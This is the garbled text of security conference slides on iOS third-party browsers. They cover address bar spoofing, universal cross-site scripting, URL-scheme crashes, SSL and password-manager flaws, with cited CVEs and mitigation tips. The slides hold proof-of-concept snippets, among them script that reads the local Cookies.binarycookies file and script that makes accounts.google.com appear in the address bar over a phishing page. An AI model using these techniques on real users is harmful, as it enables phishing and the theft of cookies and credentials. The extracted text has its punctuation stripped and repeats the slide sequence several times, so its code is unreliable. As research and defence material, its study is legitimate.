bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
